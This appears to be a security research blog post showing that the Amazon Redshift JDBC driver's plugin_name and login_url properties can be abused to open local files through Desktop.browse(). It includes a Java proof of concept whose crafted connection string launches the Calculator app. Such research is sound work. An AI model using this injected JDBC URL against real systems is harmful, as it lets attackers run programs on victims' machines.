Amazon Redshift JDBC Attack Trick

pyn3rd

2022-06-29 (Updated: 2022-10-17)

Amazon Redshift JDBC Driver supports plenty of properties as well.

https://docs.aws.amazon.com/redshift/latest/mgmt/options-for-providing-iam-credentials.html

However, there are two special properties plugin_name and login_url. The plugin_name is used for providing IAM credentials. The Amazon Redshift JDBC driver includes SAML-based credential provider plugins. One of the plugins is for SAML MFA , the plugin class named com.amazon.redshift.plugin.BrowserSamlCredentialsProvider

upload successful

So set the breakpoint at the method openBrowser() of BrowserSamlCredentialsProvider class

upload successful

Apparently , the value of the property login_url steps into the method Desktop.getDesktop().browse()

As we know, the method Desktop.getDesktop().browse() of the package java.awt will launch the default browser to display URI. Here is the sample for explanation

upload successful

Consequently, just set file:///System/Applications/Calculator.app as the value of property login_url, the default browser will display it. Here is the PoC

import java.sql.DriverManager;
import java.sql.SQLException;

public class RedshiftDemo {
    public static void main(String[] args) throws SQLException {

        System.out.println("Amazon Redshift Driver Version: " + com.amazon.redshift.jdbc42.Driver.class.getPackage().getSpecificationVersion());

        DriverManager.registerDriver(new com.amazon.redshift.jdbc42.Driver());

        DriverManager.getConnection("jdbc:redshift:iam://mycluster:us-west-2/dev?plugin_name=com.amazon.redshift.plugin.BrowserSamlCredentialsProvider&login_url=file:///System/Applications/Calculator.app");
    }
}

upload successful

Make JDBC Attacks Brilliant Again!